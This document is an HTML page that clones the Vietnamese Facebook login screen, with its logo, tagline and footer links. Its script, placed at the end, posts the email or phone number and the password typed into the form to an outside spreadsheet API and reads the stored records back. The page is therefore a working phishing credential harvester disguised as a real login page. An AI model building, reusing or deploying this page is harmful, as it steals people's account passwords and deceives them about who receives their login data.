<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title id="pageTitle">Facebook – log in or sign up</title>
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<!-- jQuery library -->
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

	<!-- Popper JS -->
	<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>

	<!-- Latest compiled JavaScript -->
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
	<style>
		body{
			background: #f0f2f5;
		}
		.content{
			height: 60vh;
			padding-bottom: 112px;
    		padding-top: 72px;
		}
		form{
			width: 93%;
			margin: 0;
    		padding: 0;
		}
		.form-gr{
			padding-bottom: 24px;
    		padding-top: 10px;
    		align-items: center;
    		justify-content: center;
		    background-color: #fff;
		    border: none;
		    border-radius: 8px;
		    box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
		    box-sizing: border-box;
		    margin: 40px 0 0;
		    padding: 20px 0 28px;
		    width: 63%;
		    height: fit-content;
		}
		.input-fb{
		    line-height: 16px;
		    vertical-align: middle;
			border-radius: 6px;
			font-size: 17px;
		    padding: 25px 16px;
		    background: #FFFFFF url(https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/YQNfPR9MJfx.png) repeat-x;
		    border: 1px solid #dddfe2;
		    color: #1d2129;
		}
		.btn-login{
			cursor: pointer;
		    display: inline-block;
		    text-decoration: none;
		    white-space: nowrap;
			background-color: #1877f2;
		    border: none;
		    border-radius: 6px;
		    font-size: 20px;
		    line-height: 48px;
		    padding: 0 16px;
		    color: #fff;
		    transition: 200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform;
		    -webkit-font-smoothing: antialiased;
		    font-weight: bold;
		    justify-content: center;
		    position: relative;
		    text-align: center;
		    text-shadow: none;
		    vertical-align: middle;
		    width: 100%;
		}
		.title{
			font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
		    font-size: 28px;
		    font-weight: normal;
		    line-height: 32px;
		    padding: 0 0 20px;
		    padding-left: 32px;
		}
		.stretch{
			align-items: center;
		    border-bottom: 1px solid #dadde1;
		    display: flex;
		    margin: 20px 16px;
		    text-align: center;
		}
		.btn-add-new{
			background-color: #42b72a;
			cursor: pointer;
		    display: block;
		    margin: 0 auto;
		    text-decoration: none;
		    white-space: nowrap;
		    border: none;
		    border-radius: 6px;
		    font-size: 17px;
		    line-height: 48px;
		    padding: 0 16px;
		    width: fit-content;
		}
		.logo-fb{
			padding: 112px 0 16px;
		}
		.logo-fb img{
			height: 106px;
			width: auto;
		}
		.col-md-7{
			flex-direction: column;
			align-items: center;
		}
		footer{
			margin-top: 360px;
			background-color: #fff;
		}
		footer ul{
			align-items: center;
		    display: flex;
		    flex-wrap: wrap;
		    list-style-type: none;
		    margin: 0;
		    padding: 0;
		}
		footer ul li{
			padding-right: 0;
			padding-left: 10px;
			vertical-align: top;
			border-width: 0 0 0 1px;
    		display: inline-block;
		}
		footer ul li a{
			text-decoration: none;
    		white-space: nowrap;
    		color: #8a8d91;
		}
		#pageFooter {
		    color: #737373;
		    margin: 0 auto;
		    padding-top: 20px;
		    padding-bottom: 20px;
		}
		#pageFooter a:last-child {
		    margin-right: 0;
		}
		._42ft {
		    cursor: pointer;
		    display: inline-block;
		    text-decoration: none;
		    white-space: nowrap;
		}
		._4jy0 {
		    border: 1px solid;
		    border-radius: 2px;
		    box-sizing: content-box;
		    font-size: 12px;
		    -webkit-font-smoothing: antialiased;
		    font-weight: bold;
		    justify-content: center;
		    padding: 0 8px;
		    position: relative;
		    text-align: center;
		    text-shadow: none;
		    vertical-align: middle;
		}
		.mvl {
		    margin-top: 20px;
		    margin-bottom: 20px;
		}
		#pageFooter .copyright {
		    font-size: 11px;
		    padding-left: 13px;
		}
		.txt-page{
			width: 65%;
		}
		@media only screen and (max-width: 767px) {
			.content{
				height: inherit!important;
				padding-top: 0;
				padding-bottom: 0;
			}
			.form-gr{
				width: 95%;
			}
			footer {
			    margin-top: 50px
			}
		}
	</style>
</head>
<body>
	<div class="container">
		<div class="row content">
			<div class="col-md-5 col-xs-12">
				<div class="logo-fb">
					<img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook">
				</div>
				<h2 class="title">Facebook giúp bạn kết nối và chia sẻ với mọi người trong cuộc sống của bạn.</h2>
			</div>
			<div class="col-md-7 col-xs-12 d-flex justify-content-center">
				<div class="form-gr d-flex">
					<form id="myForm" class="form">
						<div class="form-group">
							<input type="text" name="account" class="form-control input-fb" id="inputEmail" placeholder="Email hoặc số điện thoại">
						</div>
						<div class="form-group">
							<input type="password" name="password" class="form-control input-fb" id="inputPassword" placeholder="Mật khẩu">
						</div>
						<div class="form-group ">
							<button type="button" onclick="SubForm()" class="btn btn-secondary btn-login">Đăng nhập</button>
						</div>
						<div class="form-group text-center">
							<a href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjM3NDA0NzE3LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login">Quên mật khẩu?</a>
						</div>
						<div class="stretch"></div>
						<a role="button" class="btn btn-success btn-add-new" href="#">Tạo tài khoản mới</a>
					</form>
				</div>	
				<div id="reg_pages_msg" class="_58mk mt-4 text-center txt-page"><a href="/pages/create/?ref_type=registration_form" class="_8esh">Tạo Trang</a> dành cho người nổi tiếng, thương hiệu hoặc doanh nghiệp.</div>
				
			</div>
		</div>
	</div>
	<footer>
		<div class="container">
			<div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
			   <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
			      <li>Tiếng Việt</li>
			      <li><a class="_sv4" dir="ltr" href="https://en-gb.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;en_GB&quot;, &quot;vi_VN&quot;, &quot;https:\/\/en-gb.facebook.com\/&quot;, &quot;www_list_selector&quot;, 0); return false;" title="English (UK)">English (UK)</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://zh-tw.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_TW&quot;, &quot;vi_VN&quot;, &quot;https:\/\/zh-tw.facebook.com\/&quot;, &quot;www_list_selector&quot;, 1); return false;" title="Traditional Chinese (Taiwan)">中文(台灣)</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://ko-kr.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ko_KR&quot;, &quot;vi_VN&quot;, &quot;https:\/\/ko-kr.facebook.com\/&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Korean">한국어</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://ja-jp.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ja_JP&quot;, &quot;vi_VN&quot;, &quot;https:\/\/ja-jp.facebook.com\/&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Japanese">日本語</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;vi_VN&quot;, &quot;https:\/\/fr-fr.facebook.com\/&quot;, &quot;www_list_selector&quot;, 4); return false;" title="French (France)">Français (France)</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://th-th.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;th_TH&quot;, &quot;vi_VN&quot;, &quot;https:\/\/th-th.facebook.com\/&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Thai">ภาษาไทย</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;vi_VN&quot;, &quot;https:\/\/es-la.facebook.com\/&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Spanish">Español</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;vi_VN&quot;, &quot;https:\/\/pt-br.facebook.com\/&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Portuguese (Brazil)">Português (Brasil)</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;vi_VN&quot;, &quot;https:\/\/de-de.facebook.com\/&quot;, &quot;www_list_selector&quot;, 8); return false;" title="German">Deutsch</a></li>
			      <li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;vi_VN&quot;, &quot;https:\/\/it-it.facebook.com\/&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Italian">Italiano</a></li>
			      <li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fit-it.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Hiển thị thêm ngôn ngữ"><i class="fa fa-plus" aria-hidden="true"></i></a></li>
			   </ul>
			   <div id="contentCurve"></div>
			   <div id="pageFooterChildren" role="contentinfo" aria-label="Liên kết trang web Facebook">
			      <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
			         <li><a href="/r.php" title="Đăng ký Facebook">Đăng ký</a></li>
			         <li><a href="/login/" title="Đăng nhập Facebook">Đăng nhập</a></li>
			         <li><a href="https://messenger.com/" title="Xem Messenger.">Messenger</a></li>
			         <li><a href="/lite/" title="Facebook Lite dành cho Android.">Facebook Lite</a></li>
			         <li><a href="https://www.facebook.com/watch/" title="Lướt xem video của chúng tôi trên tab Watch.">Watch</a></li>
			         <li><a href="/places/" title="Xem những địa điểm nổi tiếng trên Facebook.">Địa điểm</a></li>
			         <li><a href="/games/" title="Xem trò chơi trên Facebook.">Trò chơi</a></li>
			         <li><a href="/marketplace/" title="Mua bán trên Facebook Marketplace.">Marketplace</a></li>
			         <li><a href="https://pay.facebook.com/" title="Tìm hiểu thêm về Facebook Pay" target="_blank">Facebook Pay</a></li>
			         <li><a href="/jobs/" title="Ứng tuyển việc làm và tuyển dụng trên Facebook.">Việc làm</a></li>
			         <li><a href="https://www.oculus.com/" title="Tìm hiểu thêm về Oculus" target="_blank">Oculus</a></li>
			         <li><a href="https://portal.facebook.com/" title="Tìm hiểu thêm về Facebook Portal" target="_blank">Portal</a></li>
			         <li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2maT52f6OdRhQYjvOGJVSbuA1EkhkTQ98QKaV7n_FgRGw36ilHzag4N1aADysTJYILGZd7IzYJmsNy-dAxliEL_DbKE07zD2ky37ZTjJO7MHBeL6cGmj77GysEsf1aZw_lQlQRZD4bzhxf5h3FEg" title="Hãy xem Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li>
			         <li><a href="https://www.bulletin.com/" title="Xem bản tin trên Bulletin">Bulletin</a></li>
			         <li><a href="/local/lists/245019872666104/" title="Lướt xem thư mục Danh sách địa phương của chúng tôi.">Địa phương</a></li>
			         <li><a href="/fundraisers/" title="Quyên góp cho các mục đích có ý nghĩa.">Chiến dịch gây quỹ</a></li>
			         <li><a href="/biz/directory/" title="Lướt xem thư mục Dịch vụ Facebook của chúng tôi.">Dịch vụ</a></li>
			         <li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Xem Trung tâm thông tin bỏ phiếu.">Trung tâm thông tin bỏ phiếu</a></li>
			         <li><a href="/groups/explore/" title="Khám phá nhóm.">Nhóm</a></li>
			         <li><a href="https://about.facebook.com/" accesskey="8" title="Đọc blog của chúng tôi, khám phá trung tâm tài nguyên và tìm cơ hội việc làm.">Giới thiệu</a></li>
			         <li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Quảng cáo trên Facebook.">Tạo quảng cáo</a></li>
			         <li><a href="/pages/create/?ref_type=site_footer" title="Tạo Trang">Tạo Trang</a></li>
			         <li><a href="https://developers.facebook.com/?ref=pf" title="Phát triển trên nền tảng của chúng tôi.">Nhà phát triển</a></li>
			         <li><a href="/careers/?ref=pf" title="Tạo bước ngoặt mới trong sự nghiệp của bạn với công ty tuyệt vời của chúng tôi">Tuyển dụng</a></li>
			         <li><a data-nocookies="1" href="/privacy/explanation" title="Tìm hiểu về quyền riêng tư của bạn và Facebook">Quyền riêng tư</a></li>
			         <li><a href="/policies/cookies/" title="Tìm hiểu về cookie và Facebook." data-nocookies="1">Cookie</a></li>
			         <li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Tìm hiểu về Lựa chọn quảng cáo.">Lựa chọn quảng cáo<i class="img sp_Xnd7Tmx8bph sx_b45c37"></i></a></li>
			         <li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Xem lại điều khoản và chính sách của chúng tôi.">Điều khoản</a></li>
			         <li><a href="/help/?ref=pf" accesskey="0" title="Truy cập Trung tâm trợ giúp của chúng tôi.">Trợ giúp</a></li>
			         <li><a accesskey="6" class="accessible_elem" href="/settings" title="Xem và chỉnh sửa cài đặt Facebook.">Cài đặt</a></li>
			         <li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="Xem nhật ký hoạt động">Nhật ký hoạt động</a></li>
			      </ul>
			   </div>
			   <div class="mvl copyright">
			      <div><span> Meta © 2021</span></div>
			   </div>
			</div>
		</div>
			
	</footer>
	<script src="https://code.jquery.com/jquery-3.4.1.js" integrity="sha256-WpOohJOqMqqyKL9FccASB9O0KwACQJpFTUBLTYOVvVU=" crossorigin="anonymous"></script>
	<script>
		function SubForm (){
			$.ajax({
				url:"https://api.apispreadsheets.com/data/20672/",
				type:"post",
				data:$("#myForm").serializeArray(),
				success: function(){
					alert("Form Data Submitted :)");
					read();
				},
				error: function(){
					alert("There was an error :(")
				}
			});
		}
		function read (){
			$.ajax({
				url:"https://api.apispreadsheets.com/data/20672/",
				type:"GET",
				data:$("#myForm").serializeArray(),
				success: function(respone){
					console.log(respone);
				},
				error: function(){
					alert("There was an error :(")
				}
			});
		}
		
	</script>
</body>
</html>